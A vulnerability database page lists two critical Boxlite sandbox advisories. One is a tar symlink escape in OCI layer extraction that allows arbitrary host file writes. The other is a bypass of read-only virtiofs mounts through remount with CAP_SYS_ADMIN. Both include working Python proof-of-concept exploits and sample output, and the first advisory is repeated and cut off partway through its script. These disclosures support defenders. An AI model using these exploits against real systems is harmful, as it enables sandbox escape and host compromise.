Boxlite

Source repositories

https://github.com/boxlite-ai/boxlite

CVEs (2)

CVE	Vendor / Product	Sev	Risk	CVSS	EPSS	KEV	Published	Description
CVE-2026-46703	Boxlite Ai Boxlite	cri	0.59	—	—		May 21, 2026	#### Summary Boxlite is a sandbox service that allows users to create lightweight virtual machines (Boxes) and run OCI containers within them. Boxlite allows users to specify the OCI image used by containers in the sandbox. However, when processing tar entries in OCI images, Boxlite does not account for the possibility that entries may be symlinks pointing to absolute paths. An attacker can craft a malicious OCI image and distribute it on image hosting platforms such as DockerHub, tricking users into using it. Once a user loads the malicious image, the attacker can write arbitrary content to any path on the host, which can further lead to remote code execution on the host. #### Details 1. Entry Point — OCI Layer Tarball Extraction File: `boxlite/src/images/archive/tar.rs` Function: `extract_layer_tarball_streaming()` (line 24) Code: ```rust pub fn extract_layer_tarball_streaming(tarball_path: &Path, dest: &Path) -> BoxliteResult { // ... apply_oci_layer(reader, dest) } ``` Issue: The function passes the tar reader into `apply_oci_layer`. The tarball comes from a registry blob that has passed SHA256 integrity verification against the manifest digest — but the manifest itself is controlled by the registry, so a malicious registry can serve a valid manifest pointing to a crafted layer blob with a matching digest. 2. Main Extraction Loop — Symlink Created Without Target Validation File: `boxlite/src/images/archive/tar.rs` Function: `apply_oci_layer()` (line 196) Code: ```rust EntryType::Symlink => { let target = link_name.ok_or_else(\|\| { /* ... / })?; create_symlink(&full_path, &target)?; // line 327 — target is NOT validated } ``` Issue:* The symlink's `full_path` (the link itself) is sanitized by `normalize_entry_path` to stay within `dest`. However, the `target` (what the symlink points to) is never validated. An entry with path `usr` and link target `/etc` creates `{dest}/usr -> /etc`, a symlink pointing outside the extraction root. There is no check that `target` stays within `dest`, is relative, or doesn't escape the container root. 3. Symlink Target Written Verbatim File: `boxlite/src/images/archive/tar.rs` Function: `create_symlink()` (line 747) Code: ```rust fn create_symlink(path: &Path, target: &Path) -> BoxliteResult<()> { std::os::unix::fs::symlink(target, path).map_err(\|e\| { /* ... / }) } ``` Issue:* `std::os::unix::fs::symlink` is an `lstat`-level operation — it creates the symlink with the provided target string verbatim, no matter what it contains. If `target` is `/etc`, the link records `/etc` as the target. No containment check. 4. ensure_parent_dirs Deliberately Follows and Preserves Escape Symlinks File: `boxlite/src/images/archive/tar.rs` Function: `ensure_parent_dirs()` (line 457) Code: ```rust Ok(m) if m.file_type().is_symlink() => { // Check if symlink points to a directory match fs::metadata(current_check) { // follows symlink Ok(target_m) if target_m.is_dir() => { trace!("Preserving symlink that points to directory: ..."); break; // line 516 — stop, keep the symlink, treat as valid parent } ``` Issue: When the next tar entry has path `usr/passwd` and the code calls `ensure_parent_dirs("{dest}/usr/passwd", dest)`, it walks up to `{dest}/usr`, finds it is a symlink pointing to a directory (e.g., `/etc`), and explicitly breaks the loop to preserve it — treating the out-of-root symlink as a valid, navigable parent. The `create_dir_all` call is then skipped for this path. The caller proceeds to open and write `{dest}/usr/passwd`, which the kernel resolves through the symlink to `/etc/passwd`. 5. File Written Through Escaped Symlink File: `boxlite/src/images/archive/tar.rs` Function: `create_regular_file()` (line 715) Code: ```rust fn create_regular_file<R: Read>(entry: &mut Entry, path: &Path, mode: u32) -> BoxliteResult<()> { let mut file = OpenOptions::new() .write(true).create(true).truncate(true).mode(mode) .open(path) // path = "{dest}/usr/passwd" which kernel follows to "/etc/passwd" .map_err(\|e\| { /* ... / })?; io::copy(entry, &mut file)?; // attacker-controlled content written to /etc/passwd Ok(()) } ``` Issue:* `OpenOptions::open()` follows symlinks in path components by default. The kernel resolves `{dest}/usr/passwd` → `{dest}/usr` is a symlink to `/etc` → file opened at `/etc/passwd`. Attacker-controlled tar entry content is copied there verbatim. As seen from the code, when a tar entry is a symlink, Boxlite's security checks are insufficient. An attacker can exploit this vulnerability to achieve arbitrary file write once a user loads a maliciously crafted image. The write permission is consistent with the process privilege running the Boxlite service, which is commonly root on Linux. The attacker can further leverage this capability to achieve remote code execution, such as writing the attacker's public key into the host's authorized_keys. #### PoC 1. Install Boxlite following the official tutorial. 2. Run the following Python script: ```python #!/usr/bin/env python3 """ PoC: BoxLite OCI Layer Extraction Symlink Escape ================================================= Vulnerability: boxlite/src/images/archive/tar.rs — extract_layer_tarball_streaming() Type: CWE-61 / CAPEC-132 — Symlink Following during tar extraction Attack: OCI images consist of layer tarballs extracted on the host to build the ext4 base image. If the extractor follows a symlink without verifying the resolved path stays within the extraction root, an attacker can craft a tar like: [1] SYMLINK escape -> /tmp (points to host /tmp) [2] FILE escape/poc/pwned.txt (resolves via [1] to /tmp/poc/pwned.txt) KVM hardware isolation is irrelevant here — tar extraction happens in the host process before the VM ever starts. Target write: /tmp/boxlite_host_escape/pwned.txt Expected isolation boundary: boxlite internal staging dir under /tmp """ import asyncio import hashlib import io import json import os import shutil import tarfile import time TARGET_FILE = "/tmp/boxlite_host_escape/pwned.txt" OCI_LAYOUT_DIR = "/tmp/malicious_oci_layout" # ── Helpers ─────────────────────────────────────────────────────────────────── def sha256hex(data: bytes) -> str: return hashlib.sha256(data).hexdigest() def add_entry( tf: tarfile.TarFile, name: str, type_: bytes, linkname: str = "", data: bytes = b"", mode: int = 0o644, ): info = tarfile.TarInfo(name=name) info.type = type_ info.linkname = linkname info.size = len(data) info.mode = mode info.mtime = int(time.time()) tf.addfile(info, io.BytesIO(data) if data else None) # ── Step 1: Build malicious OCI layer tar ───────────────────────────────────── def build_layer_tar() -> bytes: """ Tar entries (order matters): [1] SYMLINK escape -> /tmp [2] DIR escape/boxlite_host_escape/ (resolves to /tmp/boxlite_host_escape/) [3] FILE escape/boxlite_host_escape/pwned.txt (resolves to /tmp/…/pwned.txt) [4] FILE etc/os-release (legitimate-looking decoy entries) """ payload = ( "===== BOXLITE SYMLINK ESCAPE: HOST FILESYSTEM WRITE =====\n" f"Written at: {time.strftime('%Y-%m-%d %H:%M:%S')}\n" f"Target: {TARGET_FILE}\n" "========================================================\n" ).encode() buf = io.BytesIO() with tarfile.open(fileobj=buf, mode="w") as tf: add_entry(tf, "escape", tarfile.SYMTYPE, linkname="/tmp", mode=0o777) add_entry(tf, "escape/boxlite_host_escape", tarfile.DIRTYPE, mode=0o755) add_entry( tf, "escape/boxlite_host_escape/pwned.txt", tarfile.REGTYPE, data=payload ) add_entry( tf, "etc/os-release", tarfile.REGTYPE, data=b"ID=alpine\nVERSION_ID=3.19.0\n", ) return buf.getvalue() # ── Step 2: Build OCI image layout ─────────────────────────────────────────── def build_oci_layout(out_dir: str) -> None: blobs = os.path.join(out_dir, "blobs", "sha256") os.makedirs(blobs, exist_ok=True) def write_blob(data: bytes) -> tuple[str, int]: dgst = sha256hex(data) with open(os.path.join(blobs, dgst), "wb") as f: f.write(data) return dgst, len(data) layer_bytes = build_layer_tar() layer_dgst, layer_sz = write_blob(layer_bytes) config_bytes = json.dumps( { "architecture": "amd64", "os": "linux", "config": {"Cmd": ["/bin/sh"]}, "rootfs": {"type": "layers", "diff_ids": [f"sha256:{layer_dgst}"]}, } ).encode() cfg_dgst, cfg_sz = write_blob(config_bytes) manifest_bytes = json.dumps( { "schemaVersion": 2, "mediaType": "application/vnd.oci.image.manifest.v1+json", "config": { "mediaType": "application/vnd.oci.image.config.v1+json", "digest": f"sha256:{cfg_dgst}", "size": cfg_sz, }, "layers": [ { "mediaType": "application/vnd.oci.image.layer.v1.tar", "digest": f"sha256:{layer_dgst}", "size": layer_sz, } ], } ).encode() mf_dgst, mf_sz = write_blob(manifest_bytes) with open(os.path.join(out_dir, "index.json"), "w") as f: json.dump( { "schemaVersion": 2, "manifests": [ { "mediaType": "application/vnd.oci.image.manifest.v1+json", "digest": f"sha256:{mf_dgst}", "size": mf_sz, "annotations": {"org.opencontainers.image.ref.name": "latest"}, } ], }, f, ) with open(os.path.join(out_dir, "oci-layout"), "w") as f: json.dump({"imageLayoutVersion": "1.0.0"}, f) print(f" layer sha256:{layer_dgst[:16]}… ({layer_sz} B)") print(f" config sha256:{cfg_dgst[:16]}… ({cfg_sz} B)") print(f" manifest sha256:{mf_dgst[:16]}… ({mf_sz} B)") # ── Main ────────────────────────────────────────────────────────────────────── async def main(): print("=" * 60) print(" PoC: BoxLite OCI Layer Extraction Symlink Escape") print("=" * 60) # Clean up previous run artifacts for path in [TARGET_FILE, "/tmp/boxlite_host_escape", OCI_LAYOUT_DIR]: if os.path.isfile(path): os.remove(path) elif os.path.isdir(path): shutil.rmtree(path) # [1] Build malicious OCI image print(f"\n[1] Building malicious OCI image → {OCI_LAYOUT_DIR}") build_oci_layout(OCI_LAYOUT_DIR) # [2] Show crafted tar entries print("\n[2] Malicious layer tar entries:") with open(os.path.join(OCI_LAYOUT_DIR, "index.json")) as f: idx = json.load(f) mf_dgst = idx["manifests"][0]["digest"].split(":")[1] with open(os.path.join(OCI_LAYOUT_DIR, "blobs", "sha256", mf_dgst)) as f: mf = json.load(f) lyr_dgst = mf["layers"][0]["digest"].split(":")[1] lyr_data = open( os.path.join(OCI_LAYOUT_DIR, "blobs", "sha256", lyr_dgst), "rb" ).read() with tarfile.open(fileobj=io.BytesIO(lyr_data)) as tf: for m in tf.getmembers(): tstr = { tarfile.REGTYPE: "FILE ", tarfile.SYMTYPE: "SYMLINK", tarfile.DIRTYPE: "DIR ", }.get(m.type, f"?{m.type} ") suffix = f" -> {m.linkname}" if m.issym() else "" print(f" {tstr} {m.name}{suffix}") # [3] Confirm target absent before exploit print(f"\n[3] Pre-exploit — target exists? {os.path.exists(TARGET_FILE)}") # [4] Trigger extraction (vulnerability fires before VM starts) print(f"\n[4] Loading malicious image via boxlite.SimpleBox(rootfs_path=…)") import boxlite try: async with boxlite.SimpleBox(rootfs_path=OCI_LAYOUT_DIR) as box: r = await box.exec("sh", "-c", "echo ok") print(f" VM stdout: {r.stdout.strip()}") except Exception as e: # Box may fail to start (incomplete rootfs) — that's fine; # the symlink escape occurs during layer extraction, before VM launch. print(f" Box error (expected): {type(e).__name__}: {e}") # [5] Verify host write print(f"\n[5] Post-exploit — target exists? {os.path.exists(TARGET_FILE)}") if os.path.exists(TARGET_FILE): print(f"\n VULNERABLE — host file written successfully!") print(f" Path: {TARGET_FILE}") print(open(TARGET_FILE).read()) else: print("\n NOT VULNERABLE (or already patched)") if __name__ == "__main__": asyncio.run(main()) ``` This script constructs a malicious OCI image and passes it to the SimpleBox function via rootfs_path to create a container. In the malicious image, a symlink is first created pointing `escape` to `/tmp`, and then files are written under `escape`, thereby achieving file writes to the root filesystem. Sample output: ``` $ python3 poc_symlink_escape.py ============================================================ PoC: BoxLite OCI Layer Extraction Symlink Escape ============================================================ [1] Building malicious OCI image → /tmp/malicious_oci_layout layer sha256:a1e8b4de11d64fce… (10240 B) config sha256:8e245c2c65565998… (191 B) manifest sha256:2dad6671e78d8093… (415 B) [2] Malicious layer tar entries: SYMLINK escape -> /tmp DIR escape/boxlite_host_escape FILE escape/boxlite_host_escape/pwned.txt FILE etc/os-release [3] Pre-exploit — target exists? False [4] Loading malicious image via boxlite.SimpleBox(rootfs_path=…) Box error (expected): RuntimeError: internal error: Container init failed: Failed to start container: internal error: Failed to create container b673b4e3400c71bd72464c98610c952e2164f70f946873b82adf3e6212851d54 at bundle /run/boxlite/containers/b673b4e3400c71bd72464c98610c952e2164f70f946873b82adf3e6212851d54: failed to create container: exec process failed with error error in executing process : PATH environment variable is not set [5] Post-exploit — target exists? True VULNERABLE — host file written successfully! Path: /tmp/boxlite_host_escape/pwned.txt ===== BOXLITE SYMLINK ESCAPE: HOST FILESYSTEM WRITE ===== Written at: ... Target: /tmp/boxlite_host_escape/pwned.txt ======================================================== ``` #### Impact An attacker can craft a malicious OCI image and distribute it on image hosting platforms such as DockerHub, tricking users into using it. Once a user loads the malicious image, the attacker can write arbitrary content to any path on the host, which can further lead to remote code execution on the host. #### Score Severity: Critical, Score: 9.7, rationale as follows: - AV:N — The attacker can distribute the malicious image over the network, tricking users into pulling and using it - AC:L — This is a logic vulnerability that requires no complex exploitation - PR:N — The attacker does not need any additional privileges to exploit this vulnerability - UI:R — The attacker needs to trick the victim into using the maliciously crafted image - S:C — The attacker can leverage the vulnerability to achieve arbitrary command execution on the host, extending the impact to the host operating system and crossing the security boundary - C:H/I:H/A:H — The attacker can leverage the vulnerability to gain RCE capability on the host, posing a significant threat to confidentiality, integrity, and availability #### Credit This vulnerability was discovered by: - XlabAI Team of Tencent Xuanwu Lab - Atuin Automated Vulnerability Discovery Engine If there are any questions regarding the vulnerability details, please feel free to reach out to BoxLite for further discussion by emailing xlabai@tencent.com. #### Note Note that Boxlite follows the industry-standard 90+30 disclosure policy (Reference: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html). This means that BoxLite reserves the right to disclose the details of the vulnerability 30 days after the fix has been implemented.
CVE-2026-46695	Boxlite Ai Boxlite	cri	0.59	—	—		May 21, 2026	#### Summary Boxlite is a sandbox service that allows users to create lightweight virtual machines (Boxes) and launch OCI containers within them to run untrusted code. One of the core security features claimed by Boxlite is the ability to mount host directories in read-only mode (read_only=True) into the VM via the virtiofs protocol (a host-guest shared filesystem protocol designed specifically for virtual machines), so that untrusted code can only read but not modify host data. Since the underlying function of the lightweight VM library libkrun used by Boxlite does not support mounting in read-only mode, Boxlite chooses to implement read-only by adding the MS_RDONLY flag when mounting the directory after the VM starts. However, because Boxlite does not restrict the kernel capabilities available inside the container, malicious code can remount the directory in rw mode, thereby gaining write access to that directory. This allows malicious code to perform arbitrary write operations on directories that should be read-only. In typical usage scenarios of Boxlite, an attacker can leverage this vulnerability to gain code execution capability on the host. For example, in AI Agent scenarios, user code, virtual environments, credentials, configuration files, and other content are often mounted in read-only mode into the container. Malicious code inside the sandbox can modify this information, such as planting malicious code, to gain code execution capability on the host, which may further introduce supply chain risks. #### Details 1. User-Facing API Documents Read-Only Guarantee File: `boxlite/src/runtime/options.rs` Function: `VolumeSpec` (line 223) Code: ```rust /// Filesystem mount specification. pub struct VolumeSpec { pub host_path: String, pub guest_path: String, pub read_only: bool, // <-- operator sets this to restrict guest write access } ``` Issue: The `read_only` field is documented (and in user-facing guides) as preventing the guest from writing to the host directory. The guarantee is "Agent can read but not write." This expectation is not met. 2. read_only Stored in FsShare — Passed to krun Without Enforcement File: `boxlite/src/vmm/krun/engine.rs` Function: `Krun::create()` (line 334) Code: ```rust for share in config.fs_shares.shares() { let path_str = share.host_path.to_str().ok_or_else(\|\| { ... })?; tracing::info!( " {} → {} ({})", share.tag, share.host_path.display(), if share.read_only { "ro" } else { "rw" } // Logged but NOT passed to krun ); ctx.add_virtiofs(&share.tag, path_str)?; // <-- read_only silently dropped } ``` Issue: `share.read_only` is logged as "ro" or "rw" but is never passed to `add_virtiofs`. The actual hypervisor call receives only tag and host path. 3. Hypervisor FFI Has No Read-Only Parameter File: `boxlite/src/vmm/krun/context.rs` Function: `add_virtiofs()` (line 423) Code: ```rust pub unsafe fn add_virtiofs(&self, mount_tag: &str, host_path: &str) -> BoxliteResult<()> { let host_path_c = CString::new(host_path) .map_err(\|e\| BoxliteError::Engine(format!("invalid host path: {e}")))?; let mount_tag_c = CString::new(mount_tag) .map_err(\|e\| BoxliteError::Engine(format!("invalid mount tag: {e}")))?; check_status("krun_add_virtiofs", unsafe { krun_add_virtiofs(self.ctx_id, mount_tag_c.as_ptr(), host_path_c.as_ptr()) // No read_only parameter — libkrun exposes the share as read-write to the guest }) } ``` Issue: `krun_add_virtiofs` in the FFI (`deps/libkrun-sys/src/lib.rs:35`) takes only `ctx_id`, `mount_tag`, and `host_path`. There is no read-only flag. Libkrun exposes the virtiofs share to the guest with full read-write access at the device level. 4. Read-Only Enforcement Is Delegated to Guest Agent (Zone 0) File: `boxlite/src/volumes/guest_volume.rs` Function: `build_guest_mounts()` (line 184) Code: ```rust for entry in &self.fs_shares { let mount_point = entry.guest_path.as_deref().unwrap_or(""); volumes.push(VolumeConfig::virtiofs( &entry.tag, mount_point, entry.read_only, // <-- sent to guest agent as instruction entry.container_id.clone(), )); } ``` Issue: The `read_only` flag is sent to the guest agent via gRPC as a mount instruction. The guest agent is expected to pass `-o ro` to the mount syscall. But the guest runs Zone 0 code — untrusted, assumed malicious. A compromised or malicious guest simply ignores this instruction. 5. FFI Declaration Confirms No Read-Only Variant Exists File: `boxlite/deps/libkrun-sys/src/lib.rs` Function: `krun_add_virtiofs` extern declaration (line 35) Code: ```rust extern "C" { pub fn krun_add_virtiofs( ctx_id: u32, mount_tag: const c_char, host_path: const c_char, ) -> i32; // No krun_add_virtiofs_ro or equivalent declared } ``` Issue: There is no alternative read-only virtiofs FFI function declared. The entire codebase has no `krun_add_virtiofs_ro` or read-only parameter variant. Enforcement at the hypervisor level does not exist. 6. OCI Spec Builder Grants All Capabilities File: `guest/src/container/capabilities.rs` Function: `all_capabilities()` (line 19) Code: ```rust pub fn all_capabilities() -> HashSet { [ // ... Capability::SysModule, // 16: load/unload kernel modules Capability::SysRawio, // 17: perform I/O port operations Capability::SysAdmin, // 21: various admin operations Capability::NetAdmin, // 12: network administration Capability::NetRaw, // 13: use RAW/PACKET sockets Capability::MacOverride, // 32: override MAC Capability::Bpf, // 39: BPF operations // ... all 41 capabilities ] .into_iter() .collect() } ``` Issue: Returns all 41 capabilities including the most dangerous ones, like `Capability::SysAdmin`. The function comment itself says "maximum compatibility but reduced security isolation." #### PoC 1. Install Boxlite following the official tutorial. 2. Run the following Python script: ```python import asyncio import os import tempfile import sys from boxlite import Boxlite, BoxOptions async def run(box, cmd): """Run shell command via native box.exec API.""" execution = await box.exec("sh", ["-c", cmd], None) stdout_stream = execution.stdout() stderr_stream = execution.stderr() stdout_lines, stderr_lines = [], [] async def read_stdout(): async for line in stdout_stream: stdout_lines.append(line if isinstance(line, str) else line.decode('utf-8', errors='replace')) async def read_stderr(): async for line in stderr_stream: stderr_lines.append(line if isinstance(line, str) else line.decode('utf-8', errors='replace')) await asyncio.gather(read_stdout(), read_stderr()) result = await execution.wait() return { 'exit_code': result.exit_code, 'stdout': ''.join(stdout_lines), 'stderr': ''.join(stderr_lines), } async def main(): # Step 1: Set up host directory with a read-only file host_dir = tempfile.mkdtemp(prefix="virtiofs_ro_poc_") ro_file = os.path.join(host_dir, "read_only.txt") with open(ro_file, "w") as f: f.write("original content\n") print(f"[+] Step 1: Host directory created: {host_dir}") print(f" read_only.txt: {open(ro_file).read().strip()}") print() guest_mount = "/mnt/sensitive" print(f"[+] Step 2: Launching BoxLite VM with:") print(f" volumes=[('{host_dir}', '{guest_mount}', True)] # read_only=True") print() try: runtime = Boxlite.default() opts = BoxOptions( image="alpine:latest", volumes=[(host_dir, guest_mount, True)], # <-- read_only=True memory_mib=512, cpus=1, auto_remove=True, ) box = await runtime.create(opts) async with box: print("[+] Step 3: VM booted. Checking virtiofs mount state...") r = await run(box, f"cat /proc/mounts \| grep sensitive") print(f" /proc/mounts: {r['stdout'].strip()}") print() print("[+] Step 4: Testing write protection (initial state)...") r2 = await run(box, f"echo 'modified content' > {guest_mount}/read_only.txt 2>&1; echo write_exit:$?") out = r2['stdout'].strip() print(f" Write attempt: {out}") if "Read-only" in out or "read-only" in out: print(f" [OK] Initially blocked - client-side MS_RDONLY is active") print() print("[!!!] Step 5: ATTACK - Bypassing read-only via remount...") r3 = await run(box, f"mount -o remount,rw {guest_mount} 2>&1; echo remount_exit:$?") print(f" Remount result: {r3['stdout'].strip()}") r4 = await run(box, f"cat /proc/mounts \| grep sensitive") print(f" Mount flags after: {r4['stdout'].strip()}") print() print("[!!!] Step 6: Writing to 'read-only' mount after bypass...") r5 = await run(box, f"echo 'modified content' > {guest_mount}/read_only.txt 2>&1; echo write_exit:$?") print(f" Write result: {r5['stdout'].strip()}") r6 = await run(box, f"cat {guest_mount}/read_only.txt") print(f" File content inside guest: {r6['stdout'].strip()}") print() print("[+] Step 7: HOST VERIFICATION") content = open(ro_file).read().strip() print(f" read_only.txt on host: {content}") print() print("FINAL RESULT:") print() if content == "modified content": print(" [!!!] VULNERABILITY CONFIRMED - EXPLOITABLE") else: print(" [?] Bypass did not produce host-side writes.") except Exception as e: print(f"[-] Error: {e}") import traceback traceback.print_exc() finally: import shutil try: shutil.rmtree(host_dir) print(f"\n[+] Cleanup: removed {host_dir}") except: pass asyncio.run(main()) ``` This script mounts a directory in read-only mode into the sandbox and attempts to exploit the vulnerability to modify a file in that directory. Expected output: ``` $ python poc.py [+] Step 1: Host directory created: /tmp/virtiofs_ro_poc_93fdis21 read_only.txt: original content [+] Step 2: Launching BoxLite VM with: volumes=[('/tmp/virtiofs_ro_poc_93fdis21', '/mnt/sensitive', True)] # read_only=True [+] Step 3: VM booted. Checking virtiofs mount state... /proc/mounts: uservol0 /mnt/sensitive virtiofs ro,relatime 0 0 [+] Step 4: Testing write protection (initial state)... Write attempt: write_exit:1 [!!!] Step 5: ATTACK - Bypassing read-only via remount... Remount result: remount_exit:0 Mount flags after: uservol0 /mnt/sensitive virtiofs rw,relatime 0 0 [!!!] Step 6: Writing to 'read-only' mount after bypass... Write result: write_exit:0 File content inside guest: modified content [+] Step 7: HOST VERIFICATION read_only.txt on host: modified content FINAL RESULT: [!!!] VULNERABILITY CONFIRMED - EXPLOITABLE [+] Cleanup: removed /tmp/virtiofs_ro_poc_93fdis21 ``` #### Impact Malicious code can perform arbitrary write operations on directories that should be read-only. In typical usage scenarios of Boxlite, an attacker can leverage this vulnerability to gain code execution capability on the host. For example, in AI Agent scenarios, user code, virtual environments, credentials, configuration files, and other content are often mounted in read-only mode into the container. Malicious code inside the sandbox can modify this information, such as planting malicious code, to gain code execution capability on the host, which may further introduce supply chain risks. #### Score Severity: Critical, Score: 10.0, rationale as follows: - AV:N — Malicious code can be transmitted through networks, such as code written by large language models. - AC:L — No special conditions or race conditions are required. The attacker simply executes a `mount -o remount,rw` command inside the container. `CAP_SYS_ADMIN` is granted by default, and the attack is deterministic and trivially reproducible. - PR:N — The attacker needs the ability to execute arbitrary code inside the Boxlite sandbox, which is the fundamental use case of Boxlite (running untrusted code). - UI:N — No user interaction is required. Malicious code inside the container can autonomously exploit this vulnerability without any action from the host operator. - S:C — The vulnerability allows the attacker to cross the sandbox trust boundary and impact the host system. The vulnerable component is the Boxlite sandbox isolation mechanism, but the impacted component is the host filesystem. - C:H — With write access to host directories, the attacker can plant malicious code that will be executed by the host, leading to full compromise of sensitive host data including credentials, API keys, user code, and configuration files mounted into the container. - I:H — The attacker gains full write access to host directories explicitly intended to be read-only, allowing arbitrary modification of host files including planting backdoors, modifying virtual environments for supply chain attacks, and altering credentials and configuration files. - A:N — The vulnerability primarily enables unauthorized write access. The host system and Boxlite service continue to function; no distinct availability impact mechanism exists beyond secondary consequences of write access. #### Credit This vulnerability was discovered by: - XlabAI Team of Tencent Xuanwu Lab - Atuin Automated Vulnerability Discovery Engine CVE and credit are preferred. If there are any questions regarding the vulnerability details, please feel free to reach out to us for further discussion. Our email address is xlabai@tencent.com. #### Note Note that BoxLite follows the industry-standard 90+30 disclosure policy (Reference: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html). This means that BoxLite reserves the right to disclose the details of the vulnerability 30 days after the fix has been implemented. #### Resolution Fixed in v0.9.0 by PR #454 (commit `2c26968e`), released 2026-04-29, with defense-in-depth across three layers: 1. Hypervisor-level read-only enforcement. virtio-fs shares are now created via `krun_add_virtiofs3` (libkrun v1.18.0) with the `read_only` flag passed through, so the share is read-only at the virtio-fs device — before any request reaches the guest kernel. A malicious guest `mount -o remount,rw` can no longer reach host data even if it regained `CAP_SYS_ADMIN`. 2. Capability restriction. Containers now receive the 14 Docker-default capabilities, explicitly excluding `CAP_SYS_ADMIN` (and `CAP_NET_ADMIN`, `CAP_SYS_MODULE`, `CAP_SYS_RAWIO`, `CAP_MAC_OVERRIDE`), so the remount in the PoC fails with `EPERM`. 3. TSI network isolation. When the network is disabled, the implicit vsock is replaced with an explicit vsock with no TSI features, closing a related guest→host socket-forwarding path. Regression coverage: `src/boxlite/tests/security_enforcement.rs` (Rust core) and `sdks/python/tests/test_readonly_volume_remount.py` (Python SDK) both replay the PoC remount attack and assert it fails. Remediation: upgrade to boxlite 0.9.0 or later (all SDKs: PyPI `boxlite`, npm `@boxlite-ai/boxlite`, Go module `github.com/boxlite-ai/boxlite/sdks/go`, crates.io `boxlite` / `boxlite-cli`). There is no workaround for affected versions; upgrade is required.

CVE-2026-46703criMay 21, 2026
Boxlite Ai
Boxlite
risk 0.59cvss —epss —
#### Summary Boxlite is a sandbox service that allows users to create lightweight virtual machines (Boxes) and run OCI containers within them. Boxlite allows users to specify the OCI image used by containers in the sandbox. However, when processing tar entries in OCI images, Boxlite does not account for the possibility that entries may be symlinks pointing to absolute paths. An attacker can craft a malicious OCI image and distribute it on image hosting platforms such as DockerHub, tricking users into using it. Once a user loads the malicious image, the attacker can write arbitrary content to any path on the host, which can further lead to remote code execution on the host. #### Details 1. Entry Point — OCI Layer Tarball Extraction **File:** `boxlite/src/images/archive/tar.rs` **Function:** `extract_layer_tarball_streaming()` (line 24) **Code:** ```rust pub fn extract_layer_tarball_streaming(tarball_path: &Path, dest: &Path) -> BoxliteResult { // ... apply_oci_layer(reader, dest) } ``` **Issue:** The function passes the tar reader into `apply_oci_layer`. The tarball comes from a registry blob that has passed SHA256 integrity verification against the manifest digest — but the manifest itself is controlled by the registry, so a malicious registry can serve a valid manifest pointing to a crafted layer blob with a matching digest. 2. Main Extraction Loop — Symlink Created Without Target Validation **File:** `boxlite/src/images/archive/tar.rs` **Function:** `apply_oci_layer()` (line 196) **Code:** ```rust EntryType::Symlink => { let target = link_name.ok_or_else(|| { /* ... */ })?; create_symlink(&full_path, &target)?; // line 327 — target is NOT validated } ``` **Issue:** The symlink's `full_path` (the link itself) is sanitized by `normalize_entry_path` to stay within `dest`. However, the `target` (what the symlink points to) is never validated. An entry with path `usr` and link target `/etc` creates `{dest}/usr -> /etc`, a symlink pointing outside the extraction root. There is no check that `target` stays within `dest`, is relative, or doesn't escape the container root. 3. Symlink Target Written Verbatim **File:** `boxlite/src/images/archive/tar.rs` **Function:** `create_symlink()` (line 747) **Code:** ```rust fn create_symlink(path: &Path, target: &Path) -> BoxliteResult<()> { std::os::unix::fs::symlink(target, path).map_err(|e| { /* ... */ }) } ``` **Issue:** `std::os::unix::fs::symlink` is an `lstat`-level operation — it creates the symlink with the provided target string verbatim, no matter what it contains. If `target` is `/etc`, the link records `/etc` as the target. No containment check. 4. ensure_parent_dirs Deliberately Follows and Preserves Escape Symlinks **File:** `boxlite/src/images/archive/tar.rs` **Function:** `ensure_parent_dirs()` (line 457) **Code:** ```rust Ok(m) if m.file_type().is_symlink() => { // Check if symlink points to a directory match fs::metadata(current_check) { // follows symlink Ok(target_m) if target_m.is_dir() => { trace!("Preserving symlink that points to directory: ..."); break; // line 516 — stop, keep the symlink, treat as valid parent } ``` **Issue:** When the next tar entry has path `usr/passwd` and the code calls `ensure_parent_dirs("{dest}/usr/passwd", dest)`, it walks up to `{dest}/usr`, finds it is a symlink pointing to a directory (e.g., `/etc`), and explicitly **breaks** the loop to preserve it — treating the out-of-root symlink as a valid, navigable parent. The `create_dir_all` call is then skipped for this path. The caller proceeds to open and write `{dest}/usr/passwd`, which the kernel resolves through the symlink to `/etc/passwd`. 5. File Written Through Escaped Symlink **File:** `boxlite/src/images/archive/tar.rs` **Function:** `create_regular_file()` (line 715) **Code:** ```rust fn create_regular_file<R: Read>(entry: &mut Entry, path: &Path, mode: u32) -> BoxliteResult<()> { let mut file = OpenOptions::new() .write(true).create(true).truncate(true).mode(mode) .open(path) // path = "{dest}/usr/passwd" which kernel follows to "/etc/passwd" .map_err(|e| { /* ... */ })?; io::copy(entry, &mut file)?; // attacker-controlled content written to /etc/passwd Ok(()) } ``` **Issue:** `OpenOptions::open()` follows symlinks in path components by default. The kernel resolves `{dest}/usr/passwd` → `{dest}/usr` is a symlink to `/etc` → file opened at `/etc/passwd`. Attacker-controlled tar entry content is copied there verbatim. As seen from the code, when a tar entry is a symlink, Boxlite's security checks are insufficient. An attacker can exploit this vulnerability to achieve arbitrary file write once a user loads a maliciously crafted image. The write permission is consistent with the process privilege running the Boxlite service, which is commonly root on Linux. The attacker can further leverage this capability to achieve remote code execution, such as writing the attacker's public key into the host's authorized_keys. #### PoC 1. Install Boxlite following the official tutorial. 2. Run the following Python script: ```python #!/usr/bin/env python3 """ PoC: BoxLite OCI Layer Extraction Symlink Escape ================================================= Vulnerability: boxlite/src/images/archive/tar.rs — extract_layer_tarball_streaming() Type: CWE-61 / CAPEC-132 — Symlink Following during tar extraction Attack: OCI images consist of layer tarballs extracted on the host to build the ext4 base image. If the extractor follows a symlink without verifying the resolved path stays within the extraction root, an attacker can craft a tar like: [1] SYMLINK escape -> /tmp (points to host /tmp) [2] FILE escape/poc/pwned.txt (resolves via [1] to /tmp/poc/pwned.txt) KVM hardware isolation is irrelevant here — tar extraction happens in the host process before the VM ever starts. Target write: /tmp/boxlite_host_escape/pwned.txt Expected isolation boundary: boxlite internal staging dir under /tmp """ import asyncio import hashlib import io import json import os import shutil import tarfile import time TARGET_FILE = "/tmp/boxlite_host_escape/pwned.txt" OCI_LAYOUT_DIR = "/tmp/malicious_oci_layout" # ── Helpers ─────────────────────────────────────────────────────────────────── def sha256hex(data: bytes) -> str: return hashlib.sha256(data).hexdigest() def add_entry( tf: tarfile.TarFile, name: str, type_: bytes, linkname: str = "", data: bytes = b"", mode: int = 0o644, ): info = tarfile.TarInfo(name=name) info.type = type_ info.linkname = linkname info.size = len(data) info.mode = mode info.mtime = int(time.time()) tf.addfile(info, io.BytesIO(data) if data else None) # ── Step 1: Build malicious OCI layer tar ───────────────────────────────────── def build_layer_tar() -> bytes: """ Tar entries (order matters): [1] SYMLINK escape -> /tmp [2] DIR 